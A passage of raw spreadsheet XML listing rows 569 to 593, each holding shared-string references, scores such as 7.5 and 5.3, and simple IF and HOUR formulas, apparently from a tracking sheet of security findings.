      <c r="V568" s="7"/>
    </row>
    <row r="569" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A569" s="3" t="s">
        <v>3181</v>
      </c>
      <c r="B569" s="4" t="s">
        <v>3182</v>
      </c>
      <c r="C569" s="4" t="s">
        <v>3183</v>
      </c>
      <c r="D569" s="4" t="s">
        <v>3184</v>
      </c>
      <c r="E569" s="4" t="s">
        <v>3185</v>
      </c>
      <c r="F569" s="4" t="s">
        <v>3186</v>
      </c>
      <c r="G569" s="4" t="s">
        <v>3187</v>
      </c>
      <c r="H569" s="4">
        <v>7.5</v>
      </c>
      <c r="I569" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J569" s="4"/>
      <c r="K569" s="4"/>
      <c r="L569" s="4">
        <f>IF(out!$G569="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M569" s="4"/>
      <c r="N569" s="4"/>
      <c r="O569" s="13"/>
      <c r="P569" s="4"/>
      <c r="Q569" s="13">
        <f>HOUR(out!$P569 -out!$N569)</f>
        <v>0</v>
      </c>
      <c r="R569" s="18"/>
      <c r="S569" s="4"/>
      <c r="T569" s="4"/>
      <c r="U569" s="4"/>
      <c r="V569" s="7"/>
    </row>
    <row r="570" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A570" s="3" t="s">
        <v>319</v>
      </c>
      <c r="B570" s="4" t="s">
        <v>3188</v>
      </c>
      <c r="C570" s="4" t="s">
        <v>3189</v>
      </c>
      <c r="D570" s="4" t="s">
        <v>3190</v>
      </c>
      <c r="E570" s="4" t="s">
        <v>3191</v>
      </c>
      <c r="F570" s="4" t="s">
        <v>3192</v>
      </c>
      <c r="G570" s="4" t="s">
        <v>3193</v>
      </c>
      <c r="H570" s="4">
        <v>6.5</v>
      </c>
      <c r="I570" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J570" s="4"/>
      <c r="K570" s="4"/>
      <c r="L570" s="4">
        <f>IF(out!$G570="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M570" s="4"/>
      <c r="N570" s="4"/>
      <c r="O570" s="13"/>
      <c r="P570" s="4"/>
      <c r="Q570" s="13">
        <f>HOUR(out!$P570 -out!$N570)</f>
        <v>0</v>
      </c>
      <c r="R570" s="18"/>
      <c r="S570" s="4"/>
      <c r="T570" s="4"/>
      <c r="U570" s="4"/>
      <c r="V570" s="7"/>
    </row>
    <row r="571" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A571" s="3" t="s">
        <v>3194</v>
      </c>
      <c r="B571" s="4" t="s">
        <v>3195</v>
      </c>
      <c r="C571" s="4" t="s">
        <v>3196</v>
      </c>
      <c r="D571" s="4" t="s">
        <v>1459</v>
      </c>
      <c r="E571" s="4" t="s">
        <v>1460</v>
      </c>
      <c r="F571" s="4" t="s">
        <v>3197</v>
      </c>
      <c r="G571" s="4" t="s">
        <v>3198</v>
      </c>
      <c r="H571" s="4">
        <v>6.5</v>
      </c>
      <c r="I571" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J571" s="4"/>
      <c r="K571" s="4"/>
      <c r="L571" s="4">
        <f>IF(out!$G571="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M571" s="4"/>
      <c r="N571" s="4"/>
      <c r="O571" s="13"/>
      <c r="P571" s="4"/>
      <c r="Q571" s="13">
        <f>HOUR(out!$P571 -out!$N571)</f>
        <v>0</v>
      </c>
      <c r="R571" s="18"/>
      <c r="S571" s="4"/>
      <c r="T571" s="4"/>
      <c r="U571" s="4"/>
      <c r="V571" s="7"/>
    </row>
    <row r="572" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A572" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B572" s="4" t="s">
        <v>3199</v>
      </c>
      <c r="C572" s="4" t="s">
        <v>3196</v>
      </c>
      <c r="D572" s="4" t="s">
        <v>1459</v>
      </c>
      <c r="E572" s="4" t="s">
        <v>1460</v>
      </c>
      <c r="F572" s="4" t="s">
        <v>3200</v>
      </c>
      <c r="G572" s="4" t="s">
        <v>3201</v>
      </c>
      <c r="H572" s="4">
        <v>7.5</v>
      </c>
      <c r="I572" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J572" s="4"/>
      <c r="K572" s="4"/>
      <c r="L572" s="4">
        <f>IF(out!$G572="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M572" s="4"/>
      <c r="N572" s="4"/>
      <c r="O572" s="13"/>
      <c r="P572" s="4"/>
      <c r="Q572" s="13">
        <f>HOUR(out!$P572 -out!$N572)</f>
        <v>0</v>
      </c>
      <c r="R572" s="18"/>
      <c r="S572" s="4"/>
      <c r="T572" s="4"/>
      <c r="U572" s="4"/>
      <c r="V572" s="7"/>
    </row>
    <row r="573" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A573" s="3" t="s">
        <v>1524</v>
      </c>
      <c r="B573" s="4" t="s">
        <v>3202</v>
      </c>
      <c r="C573" s="4" t="s">
        <v>3196</v>
      </c>
      <c r="D573" s="4" t="s">
        <v>3203</v>
      </c>
      <c r="E573" s="4" t="s">
        <v>3204</v>
      </c>
      <c r="F573" s="4" t="s">
        <v>3205</v>
      </c>
      <c r="G573" s="4" t="s">
        <v>3206</v>
      </c>
      <c r="H573" s="4">
        <v>6.5</v>
      </c>
      <c r="I573" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J573" s="4"/>
      <c r="K573" s="4"/>
      <c r="L573" s="4">
        <f>IF(out!$G573="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M573" s="4"/>
      <c r="N573" s="4"/>
      <c r="O573" s="13"/>
      <c r="P573" s="4"/>
      <c r="Q573" s="13">
        <f>HOUR(out!$P573 -out!$N573)</f>
        <v>0</v>
      </c>
      <c r="R573" s="18"/>
      <c r="S573" s="4"/>
      <c r="T573" s="4"/>
      <c r="U573" s="4"/>
      <c r="V573" s="7"/>
    </row>
    <row r="574" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A574" s="3" t="s">
        <v>2666</v>
      </c>
      <c r="B574" s="4" t="s">
        <v>3207</v>
      </c>
      <c r="C574" s="4" t="s">
        <v>3208</v>
      </c>
      <c r="D574" s="4" t="s">
        <v>2655</v>
      </c>
      <c r="E574" s="4" t="s">
        <v>2656</v>
      </c>
      <c r="F574" s="4" t="s">
        <v>3209</v>
      </c>
      <c r="G574" s="4" t="s">
        <v>3210</v>
      </c>
      <c r="H574" s="4">
        <v>6.5</v>
      </c>
      <c r="I574" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J574" s="4"/>
      <c r="K574" s="4"/>
      <c r="L574" s="4">
        <f>IF(out!$G574="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M574" s="4"/>
      <c r="N574" s="4"/>
      <c r="O574" s="13"/>
      <c r="P574" s="4"/>
      <c r="Q574" s="13">
        <f>HOUR(out!$P574 -out!$N574)</f>
        <v>0</v>
      </c>
      <c r="R574" s="18"/>
      <c r="S574" s="4"/>
      <c r="T574" s="4"/>
      <c r="U574" s="4"/>
      <c r="V574" s="7"/>
    </row>
    <row r="575" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A575" s="3" t="s">
        <v>995</v>
      </c>
      <c r="B575" s="4" t="s">
        <v>3211</v>
      </c>
      <c r="C575" s="4" t="s">
        <v>3212</v>
      </c>
      <c r="D575" s="4" t="s">
        <v>3213</v>
      </c>
      <c r="E575" s="4" t="s">
        <v>3214</v>
      </c>
      <c r="F575" s="4" t="s">
        <v>3215</v>
      </c>
      <c r="G575" s="4" t="s">
        <v>3216</v>
      </c>
      <c r="H575" s="4">
        <v>5.3</v>
      </c>
      <c r="I575" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J575" s="4"/>
      <c r="K575" s="4"/>
      <c r="L575" s="4">
        <f>IF(out!$G575="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M575" s="4"/>
      <c r="N575" s="4"/>
      <c r="O575" s="13"/>
      <c r="P575" s="4"/>
      <c r="Q575" s="13">
        <f>HOUR(out!$P575 -out!$N575)</f>
        <v>0</v>
      </c>
      <c r="R575" s="18"/>
      <c r="S575" s="4"/>
      <c r="T575" s="4"/>
      <c r="U575" s="4"/>
      <c r="V575" s="7"/>
    </row>
    <row r="576" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A576" s="3" t="s">
        <v>3217</v>
      </c>
      <c r="B576" s="4" t="s">
        <v>3218</v>
      </c>
      <c r="C576" s="4" t="s">
        <v>3219</v>
      </c>
      <c r="D576" s="4" t="s">
        <v>3220</v>
      </c>
      <c r="E576" s="4" t="s">
        <v>3221</v>
      </c>
      <c r="F576" s="4" t="s">
        <v>3222</v>
      </c>
      <c r="G576" s="4" t="s">
        <v>2856</v>
      </c>
      <c r="H576" s="4">
        <v>5.3</v>
      </c>
      <c r="I576" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J576" s="4"/>
      <c r="K576" s="4"/>
      <c r="L576" s="4">
        <f>IF(out!$G576="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M576" s="4"/>
      <c r="N576" s="4"/>
      <c r="O576" s="13"/>
      <c r="P576" s="4"/>
      <c r="Q576" s="13">
        <f>HOUR(out!$P576 -out!$N576)</f>
        <v>0</v>
      </c>
      <c r="R576" s="18"/>
      <c r="S576" s="4"/>
      <c r="T576" s="4"/>
      <c r="U576" s="4"/>
      <c r="V576" s="7"/>
    </row>
    <row r="577" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A577" s="3" t="s">
        <v>3223</v>
      </c>
      <c r="B577" s="4" t="s">
        <v>3224</v>
      </c>
      <c r="C577" s="4" t="s">
        <v>3225</v>
      </c>
      <c r="D577" s="4" t="s">
        <v>3226</v>
      </c>
      <c r="E577" s="4" t="s">
        <v>3227</v>
      </c>
      <c r="F577" s="4" t="s">
        <v>212</v>
      </c>
      <c r="G577" s="4" t="s">
        <v>213</v>
      </c>
      <c r="H577" s="4">
        <v>6.5</v>
      </c>
      <c r="I577" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J577" s="4"/>
      <c r="K577" s="4"/>
      <c r="L577" s="4">
        <f>IF(out!$G577="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M577" s="4"/>
      <c r="N577" s="4"/>
      <c r="O577" s="13"/>
      <c r="P577" s="4"/>
      <c r="Q577" s="13">
        <f>HOUR(out!$P577 -out!$N577)</f>
        <v>0</v>
      </c>
      <c r="R577" s="18"/>
      <c r="S577" s="4"/>
      <c r="T577" s="4"/>
      <c r="U577" s="4"/>
      <c r="V577" s="7"/>
    </row>
    <row r="578" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A578" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B578" s="4" t="s">
        <v>3228</v>
      </c>
      <c r="C578" s="4" t="s">
        <v>3229</v>
      </c>
      <c r="D578" s="4" t="s">
        <v>3230</v>
      </c>
      <c r="E578" s="4" t="s">
        <v>3231</v>
      </c>
      <c r="F578" s="4" t="s">
        <v>3232</v>
      </c>
      <c r="G578" s="4" t="s">
        <v>3233</v>
      </c>
      <c r="H578" s="4">
        <v>5.3</v>
      </c>
      <c r="I578" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J578" s="4"/>
      <c r="K578" s="4"/>
      <c r="L578" s="4">
        <f>IF(out!$G578="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M578" s="4"/>
      <c r="N578" s="4"/>
      <c r="O578" s="13"/>
      <c r="P578" s="4"/>
      <c r="Q578" s="13">
        <f>HOUR(out!$P578 -out!$N578)</f>
        <v>0</v>
      </c>
      <c r="R578" s="18"/>
      <c r="S578" s="4"/>
      <c r="T578" s="4"/>
      <c r="U578" s="4"/>
      <c r="V578" s="7"/>
    </row>
    <row r="579" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A579" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B579" s="4" t="s">
        <v>3234</v>
      </c>
      <c r="C579" s="4" t="s">
        <v>3235</v>
      </c>
      <c r="D579" s="4" t="s">
        <v>3236</v>
      </c>
      <c r="E579" s="4" t="s">
        <v>3237</v>
      </c>
      <c r="F579" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G579" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H579" s="4">
        <v>5.3</v>
      </c>
      <c r="I579" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J579" s="4"/>
      <c r="K579" s="4"/>
      <c r="L579" s="4">
        <f>IF(out!$G579="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M579" s="4"/>
      <c r="N579" s="4"/>
      <c r="O579" s="13"/>
      <c r="P579" s="4"/>
      <c r="Q579" s="13">
        <f>HOUR(out!$P579 -out!$N579)</f>
        <v>0</v>
      </c>
      <c r="R579" s="18"/>
      <c r="S579" s="4"/>
      <c r="T579" s="4"/>
      <c r="U579" s="4"/>
      <c r="V579" s="7"/>
    </row>
    <row r="580" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A580" s="3" t="s">
        <v>3238</v>
      </c>
      <c r="B580" s="4" t="s">
        <v>3239</v>
      </c>
      <c r="C580" s="4" t="s">
        <v>3240</v>
      </c>
      <c r="D580" s="4" t="s">
        <v>1997</v>
      </c>
      <c r="E580" s="4" t="s">
        <v>1998</v>
      </c>
      <c r="F580" s="4" t="s">
        <v>3241</v>
      </c>
      <c r="G580" s="4" t="s">
        <v>225</v>
      </c>
      <c r="H580" s="4">
        <v>6.5</v>
      </c>
      <c r="I580" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J580" s="4"/>
      <c r="K580" s="4"/>
      <c r="L580" s="4">
        <f>IF(out!$G580="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M580" s="4"/>
      <c r="N580" s="4"/>
      <c r="O580" s="13"/>
      <c r="P580" s="4"/>
      <c r="Q580" s="13">
        <f>HOUR(out!$P580 -out!$N580)</f>
        <v>0</v>
      </c>
      <c r="R580" s="18"/>
      <c r="S580" s="4"/>
      <c r="T580" s="4"/>
      <c r="U580" s="4"/>
      <c r="V580" s="7"/>
    </row>
    <row r="581" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A581" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B581" s="4" t="s">
        <v>3242</v>
      </c>
      <c r="C581" s="4" t="s">
        <v>3243</v>
      </c>
      <c r="D581" s="4" t="s">
        <v>3244</v>
      </c>
      <c r="E581" s="4" t="s">
        <v>3245</v>
      </c>
      <c r="F581" s="4" t="s">
        <v>3246</v>
      </c>
      <c r="G581" s="4" t="s">
        <v>3247</v>
      </c>
      <c r="H581" s="4">
        <v>7.5</v>
      </c>
      <c r="I581" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J581" s="4"/>
      <c r="K581" s="4"/>
      <c r="L581" s="4">
        <f>IF(out!$G581="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M581" s="4"/>
      <c r="N581" s="4"/>
      <c r="O581" s="13"/>
      <c r="P581" s="4"/>
      <c r="Q581" s="13">
        <f>HOUR(out!$P581 -out!$N581)</f>
        <v>0</v>
      </c>
      <c r="R581" s="18"/>
      <c r="S581" s="4"/>
      <c r="T581" s="4"/>
      <c r="U581" s="4"/>
      <c r="V581" s="7"/>
    </row>
    <row r="582" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A582" s="3" t="s">
        <v>3248</v>
      </c>
      <c r="B582" s="4" t="s">
        <v>3249</v>
      </c>
      <c r="C582" s="4" t="s">
        <v>3250</v>
      </c>
      <c r="D582" s="4" t="s">
        <v>3244</v>
      </c>
      <c r="E582" s="4" t="s">
        <v>3245</v>
      </c>
      <c r="F582" s="4" t="s">
        <v>54</v>
      </c>
      <c r="G582" s="4" t="s">
        <v>55</v>
      </c>
      <c r="H582" s="4">
        <v>6.5</v>
      </c>
      <c r="I582" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J582" s="4"/>
      <c r="K582" s="4"/>
      <c r="L582" s="4">
        <f>IF(out!$G582="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M582" s="4"/>
      <c r="N582" s="4"/>
      <c r="O582" s="13"/>
      <c r="P582" s="4"/>
      <c r="Q582" s="13">
        <f>HOUR(out!$P582 -out!$N582)</f>
        <v>0</v>
      </c>
      <c r="R582" s="18"/>
      <c r="S582" s="4"/>
      <c r="T582" s="4"/>
      <c r="U582" s="4"/>
      <c r="V582" s="7"/>
    </row>
    <row r="583" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A583" s="3" t="s">
        <v>3251</v>
      </c>
      <c r="B583" s="4" t="s">
        <v>3252</v>
      </c>
      <c r="C583" s="4" t="s">
        <v>3253</v>
      </c>
      <c r="D583" s="4" t="s">
        <v>3254</v>
      </c>
      <c r="E583" s="4" t="s">
        <v>3255</v>
      </c>
      <c r="F583" s="4" t="s">
        <v>3256</v>
      </c>
      <c r="G583" s="4" t="s">
        <v>3257</v>
      </c>
      <c r="H583" s="4">
        <v>6.5</v>
      </c>
      <c r="I583" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J583" s="4"/>
      <c r="K583" s="4"/>
      <c r="L583" s="4">
        <f>IF(out!$G583="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M583" s="4"/>
      <c r="N583" s="4"/>
      <c r="O583" s="13"/>
      <c r="P583" s="4"/>
      <c r="Q583" s="13">
        <f>HOUR(out!$P583 -out!$N583)</f>
        <v>0</v>
      </c>
      <c r="R583" s="18"/>
      <c r="S583" s="4"/>
      <c r="T583" s="4"/>
      <c r="U583" s="4"/>
      <c r="V583" s="7"/>
    </row>
    <row r="584" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A584" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B584" s="4" t="s">
        <v>3258</v>
      </c>
      <c r="C584" s="4" t="s">
        <v>3259</v>
      </c>
      <c r="D584" s="4" t="s">
        <v>3088</v>
      </c>
      <c r="E584" s="4" t="s">
        <v>3089</v>
      </c>
      <c r="F584" s="4" t="s">
        <v>3260</v>
      </c>
      <c r="G584" s="4" t="s">
        <v>3261</v>
      </c>
      <c r="H584" s="4">
        <v>4.3</v>
      </c>
      <c r="I584" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J584" s="4"/>
      <c r="K584" s="4"/>
      <c r="L584" s="4">
        <f>IF(out!$G584="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M584" s="4"/>
      <c r="N584" s="4"/>
      <c r="O584" s="13"/>
      <c r="P584" s="4"/>
      <c r="Q584" s="13">
        <f>HOUR(out!$P584 -out!$N584)</f>
        <v>0</v>
      </c>
      <c r="R584" s="18"/>
      <c r="S584" s="4"/>
      <c r="T584" s="4"/>
      <c r="U584" s="4"/>
      <c r="V584" s="7"/>
    </row>
    <row r="585" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A585" s="3" t="s">
        <v>3262</v>
      </c>
      <c r="B585" s="4" t="s">
        <v>3263</v>
      </c>
      <c r="C585" s="4" t="s">
        <v>3264</v>
      </c>
      <c r="D585" s="4" t="s">
        <v>3265</v>
      </c>
      <c r="E585" s="4" t="s">
        <v>3266</v>
      </c>
      <c r="F585" s="4" t="s">
        <v>3267</v>
      </c>
      <c r="G585" s="4" t="s">
        <v>3268</v>
      </c>
      <c r="H585" s="4">
        <v>5.4</v>
      </c>
      <c r="I585" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J585" s="4"/>
      <c r="K585" s="4"/>
      <c r="L585" s="4">
        <f>IF(out!$G585="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M585" s="4"/>
      <c r="N585" s="4"/>
      <c r="O585" s="13"/>
      <c r="P585" s="4"/>
      <c r="Q585" s="13">
        <f>HOUR(out!$P585 -out!$N585)</f>
        <v>0</v>
      </c>
      <c r="R585" s="18"/>
      <c r="S585" s="4"/>
      <c r="T585" s="4"/>
      <c r="U585" s="4"/>
      <c r="V585" s="7"/>
    </row>
    <row r="586" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A586" s="3" t="s">
        <v>3269</v>
      </c>
      <c r="B586" s="4" t="s">
        <v>3270</v>
      </c>
      <c r="C586" s="4" t="s">
        <v>3271</v>
      </c>
      <c r="D586" s="4" t="s">
        <v>3272</v>
      </c>
      <c r="E586" s="4" t="s">
        <v>3273</v>
      </c>
      <c r="F586" s="4" t="s">
        <v>1539</v>
      </c>
      <c r="G586" s="4" t="s">
        <v>3274</v>
      </c>
      <c r="H586" s="4">
        <v>6.5</v>
      </c>
      <c r="I586" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J586" s="4"/>
      <c r="K586" s="4"/>
      <c r="L586" s="4">
        <f>IF(out!$G586="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M586" s="4"/>
      <c r="N586" s="4"/>
      <c r="O586" s="13"/>
      <c r="P586" s="4"/>
      <c r="Q586" s="13">
        <f>HOUR(out!$P586 -out!$N586)</f>
        <v>0</v>
      </c>
      <c r="R586" s="18"/>
      <c r="S586" s="4"/>
      <c r="T586" s="4"/>
      <c r="U586" s="4"/>
      <c r="V586" s="7"/>
    </row>
    <row r="587" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A587" s="3" t="s">
        <v>3275</v>
      </c>
      <c r="B587" s="4" t="s">
        <v>3276</v>
      </c>
      <c r="C587" s="4" t="s">
        <v>3277</v>
      </c>
      <c r="D587" s="4" t="s">
        <v>3272</v>
      </c>
      <c r="E587" s="4" t="s">
        <v>3273</v>
      </c>
      <c r="F587" s="4" t="s">
        <v>1539</v>
      </c>
      <c r="G587" s="4" t="s">
        <v>3274</v>
      </c>
      <c r="H587" s="4">
        <v>7.5</v>
      </c>
      <c r="I587" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J587" s="4"/>
      <c r="K587" s="4"/>
      <c r="L587" s="4">
        <f>IF(out!$G587="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M587" s="4"/>
      <c r="N587" s="4"/>
      <c r="O587" s="13"/>
      <c r="P587" s="4"/>
      <c r="Q587" s="13">
        <f>HOUR(out!$P587 -out!$N587)</f>
        <v>0</v>
      </c>
      <c r="R587" s="18"/>
      <c r="S587" s="4"/>
      <c r="T587" s="4"/>
      <c r="U587" s="4"/>
      <c r="V587" s="7"/>
    </row>
    <row r="588" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A588" s="3" t="s">
        <v>3278</v>
      </c>
      <c r="B588" s="4" t="s">
        <v>3279</v>
      </c>
      <c r="C588" s="4" t="s">
        <v>3280</v>
      </c>
      <c r="D588" s="4" t="s">
        <v>3281</v>
      </c>
      <c r="E588" s="4" t="s">
        <v>3282</v>
      </c>
      <c r="F588" s="4" t="s">
        <v>212</v>
      </c>
      <c r="G588" s="4" t="s">
        <v>213</v>
      </c>
      <c r="H588" s="4">
        <v>5.4</v>
      </c>
      <c r="I588" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J588" s="4"/>
      <c r="K588" s="4"/>
      <c r="L588" s="4">
        <f>IF(out!$G588="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M588" s="4"/>
      <c r="N588" s="4"/>
      <c r="O588" s="13"/>
      <c r="P588" s="4"/>
      <c r="Q588" s="13">
        <f>HOUR(out!$P588 -out!$N588)</f>
        <v>0</v>
      </c>
      <c r="R588" s="18"/>
      <c r="S588" s="4"/>
      <c r="T588" s="4"/>
      <c r="U588" s="4"/>
      <c r="V588" s="7"/>
    </row>
    <row r="589" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A589" s="3" t="s">
        <v>3283</v>
      </c>
      <c r="B589" s="4" t="s">
        <v>3284</v>
      </c>
      <c r="C589" s="4" t="s">
        <v>3285</v>
      </c>
      <c r="D589" s="4" t="s">
        <v>3286</v>
      </c>
      <c r="E589" s="4" t="s">
        <v>3287</v>
      </c>
      <c r="F589" s="4" t="s">
        <v>3288</v>
      </c>
      <c r="G589" s="4" t="s">
        <v>3289</v>
      </c>
      <c r="H589" s="4">
        <v>6.5</v>
      </c>
      <c r="I589" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J589" s="4"/>
      <c r="K589" s="4"/>
      <c r="L589" s="4">
        <f>IF(out!$G589="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M589" s="4"/>
      <c r="N589" s="4"/>
      <c r="O589" s="13"/>
      <c r="P589" s="4"/>
      <c r="Q589" s="13">
        <f>HOUR(out!$P589 -out!$N589)</f>
        <v>0</v>
      </c>
      <c r="R589" s="18"/>
      <c r="S589" s="4"/>
      <c r="T589" s="4"/>
      <c r="U589" s="4"/>
      <c r="V589" s="7"/>
    </row>
    <row r="590" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A590" s="3" t="s">
        <v>3290</v>
      </c>
      <c r="B590" s="4" t="s">
        <v>3291</v>
      </c>
      <c r="C590" s="4" t="s">
        <v>3292</v>
      </c>
      <c r="D590" s="4" t="s">
        <v>1944</v>
      </c>
      <c r="E590" s="4" t="s">
        <v>1945</v>
      </c>
      <c r="F590" s="4" t="s">
        <v>3293</v>
      </c>
      <c r="G590" s="4" t="s">
        <v>3294</v>
      </c>
      <c r="H590" s="4">
        <v>7.4</v>
      </c>
      <c r="I590" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J590" s="4"/>
      <c r="K590" s="4"/>
      <c r="L590" s="4">
        <f>IF(out!$G590="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M590" s="4"/>
      <c r="N590" s="4"/>
      <c r="O590" s="13"/>
      <c r="P590" s="4"/>
      <c r="Q590" s="13">
        <f>HOUR(out!$P590 -out!$N590)</f>
        <v>0</v>
      </c>
      <c r="R590" s="18"/>
      <c r="S590" s="4"/>
      <c r="T590" s="4"/>
      <c r="U590" s="4"/>
      <c r="V590" s="7"/>
    </row>
    <row r="591" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A591" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B591" s="4" t="s">
        <v>3295</v>
      </c>
      <c r="C591" s="4" t="s">
        <v>3296</v>
      </c>
      <c r="D591" s="4" t="s">
        <v>3297</v>
      </c>
      <c r="E591" s="4" t="s">
        <v>3298</v>
      </c>
      <c r="F591" s="4" t="s">
        <v>3299</v>
      </c>
      <c r="G591" s="4" t="s">
        <v>594</v>
      </c>
      <c r="H591" s="4">
        <v>7.5</v>
      </c>
      <c r="I591" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J591" s="4"/>
      <c r="K591" s="4"/>
      <c r="L591" s="4">
        <f>IF(out!$G591="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M591" s="4"/>
      <c r="N591" s="4"/>
      <c r="O591" s="13"/>
      <c r="P591" s="4"/>
      <c r="Q591" s="13">
        <f>HOUR(out!$P591 -out!$N591)</f>
        <v>0</v>
      </c>
      <c r="R591" s="18"/>
      <c r="S591" s="4"/>
      <c r="T591" s="4"/>
      <c r="U591" s="4"/>
      <c r="V591" s="7"/>
    </row>
    <row r="592" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A592" s="3" t="s">
        <v>2857</v>
      </c>
      <c r="B592" s="4" t="s">
        <v>3300</v>
      </c>
      <c r="C592" s="4" t="s">
        <v>3301</v>
      </c>
      <c r="D592" s="4" t="s">
        <v>3302</v>
      </c>
      <c r="E592" s="4" t="s">
        <v>3303</v>
      </c>
      <c r="F592" s="4" t="s">
        <v>3304</v>
      </c>
      <c r="G592" s="4" t="s">
        <v>3305</v>
      </c>
      <c r="H592" s="4">
        <v>6.5</v>
      </c>
      <c r="I592" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J592" s="4"/>
      <c r="K592" s="4"/>
      <c r="L592" s="4">
        <f>IF(out!$G592="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M592" s="4"/>
      <c r="N592" s="4"/>
      <c r="O592" s="13"/>
      <c r="P592" s="4"/>
      <c r="Q592" s="13">
        <f>HOUR(out!$P592 -out!$N592)</f>
        <v>0</v>
      </c>
      <c r="R592" s="18"/>
      <c r="S592" s="4"/>
      <c r="T592" s="4"/>
      <c r="U592" s="4"/>
      <c r="V592" s="7"/>
    </row>
    <row r="593" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A593" s="3" t="s">
        <v>3306</v>
      </c>
      <c r="B593" s="4" t="s">
        <v>3307</v>
      </c>
      <c r="C593" s="4" t="s">
        <v>3308</v>
      </c>
      <c r="D593" s="4" t="s">
        <v>1944</v>
      </c>
      <c r="E593" s="4" t="s">
        <v>1945</v>
      </c>
      <c r="F593" s="4" t="s">
        <v>3309</v>
      </c>
      <c r="G593" s="4" t="s">
        <v>3310</v>
      </c>
      <c r="H593" s="4">
        <v>7.5</v>
      </c>
      <c r="I593" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J593" s="4"/>
      <c r="K593" s="4"/>
      <c r="L593" s="4">
        <f>IF(out!$G593="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M593" s="4"/>
      <c r="N593" s="4"/>
      <c r="O593" s="13"/>
      <c r="P593" s="4"/>
      <c r="Q593" s="13">
        <f>HOUR(out!$P593 -out!$N593)</f>
        <v>0</v>
      </c>
      <c r="R593" s="18"/>
      <c r="S593" s="4"/>
      <c r="T593" s="4"/>
      <c r="U593" s="4"/>
      <c r="V593" s="7"/>
